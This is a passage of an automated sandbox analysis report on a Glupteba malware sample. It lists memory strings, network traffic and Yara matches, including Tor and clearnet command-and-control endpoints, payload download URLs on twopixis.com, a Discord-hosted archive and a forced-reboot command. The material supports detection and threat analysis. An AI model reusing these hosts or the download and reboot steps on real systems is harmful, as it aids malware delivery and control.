Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp String found in binary or memory: http://www.xmlspy.com)
Source: csrss.exe String found in binary or memory: http://www.zlib.net/
Source: csrss.exe, 00000014.00000003.210662530760.000000000C6C6000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210662422652.000000000C6D6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.zlib.net/D
Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://1.1.1.1/dns-query
Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.sec-tunnel.com/v4/device_generate_passwordinternal
Source: csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindex
Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.sec-tunnel.com/v4/subscriber_logininconsistent
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://blockchain.infoindex
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.bar
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barMicrosoft
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barSETCONF
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barTransfer-Encodingtworkpoll
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonPro
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210654541812.000000000C8A4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe
Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/ameshkov/dnslookup/
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.comW
Source: csrss.exe, 00000014.00000003.210653294128.000000000C950000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210671924295.000000000C4BC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853
Source: csrss.exe, 00000014.00000003.210653914185.000000000C90E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar
Source: csrss.exe, 00000014.00000003.211839807582.000000000C4A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581
Source: csrss.exe, 00000014.00000003.210667598347.000000000C5EA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/poll
Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/restriction-us
Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/restriction-usH2
Source: csrss.exe, 00000014.00000003.209395939200.000000000C624000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/signature/
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e
Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.barH
Source: csrss.exe, 00000014.00000003.210659083983.000000000C7FC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
Source: csrss.exe, 00000014.00000003.213017406273.000000000C52C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210668268821.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5C4000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213015280823.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog/watchdog.exe
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog/watchdog.exeSETCONF
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog/watchdog.exeno-store
Source: csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error
Source: csrss.exe, 00000014.00000003.213015103821.000000000C5F2000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213019914167.000000000C460000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211840953641.000000000C45E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209393805620.000000000C6D8000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210667163276.000000000C5EE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213017192448.000000000C544000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: unknown HTTP traffic detected: POST /api/restriction-us HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Content-Length: 152Content-Type: application/x-www-form-urlencodedVersion: 195Accept-Encoding: gzip
Source: unknown DNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
Source: global traffic HTTP traffic detected: GET /attachments/1087398815188910163/1087399133926674453/LZ.zip HTTP/1.1Host: cdn.discordapp.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /watchdog/watchdog.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /api/signature/21f67ca2e1b8b0405399c65a0e0d031e HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /github-production-release-asset-2e65be/350494541/0257ea00-a853-11eb-8659-1a96e3eed860?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230528%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230528T093319Z&X-Amz-Expires=300&X-Amz-Signature=25a5fa811961f6d4a9ae1ad0a06038ccbf899e81292d2f437487b8af95f18898&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=350494541&response-content-disposition=attachment%3B%20filename%3Dopera-proxy.windows-386.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /watchdog/watchdog.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /w/w-8-debug.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

E-Banking Fraud
barindex
Yara detected Glupteba
Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

System Summary
barindex
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Uses 32bit PE files
Source: kdsyitkxmS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 58.3.csrss.exe.4331420.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 61.3.csrss.exe.4331420.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 10.3.kdsyitkxmS.exe.40e1420.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 23.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 31.3.csrss.exe.431bb00.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 55.3.csrss.exe.4321700.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 55.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 10.3.kdsyitkxmS.exe.40d1700.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 40.3.csrss.exe.431bb00.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 23.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.3d00000.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 10.3.kdsyitkxmS.exe.3ab0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 43.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 40.3.csrss.exe.3d00000.5.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 43.3.csrss.exe.3d00000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 40.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
